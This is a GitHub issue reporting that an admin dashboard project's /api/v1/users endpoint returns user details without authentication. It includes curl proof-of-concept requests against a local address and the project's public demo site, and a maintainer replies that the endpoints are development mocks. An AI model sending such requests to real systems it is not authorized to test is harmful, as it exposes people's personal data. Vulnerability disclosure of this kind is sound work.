Unauthorized access to some interfaces in the foreground was found. Procedure
L0ading-x opened this issue · 1 comments
L0ading-x commented
- Unauthorized access to some interfaces in the foreground leads to leakage of sensitive information
- Install according to the official documents
2.1
Unauthorized access is found on some interfaces
For example:
/api/v1/users
the poc is :
curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' http://192.168.0.125:7001/api/v1/users
2.2 At this time you can see some information back, such as the user ID, name, age, phone number, address and other sensitive information.
2.2 It can also be reproduced in the official sample site
https://antd-admin.zuiidea.com/login?from=
the poc is :
curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' https://antd-admin.zuiidea.com/api/v1/users
superlbr commented
ah...it's a frontend project, use mock interfaces just for dev. Unauthorized access is sth. with backend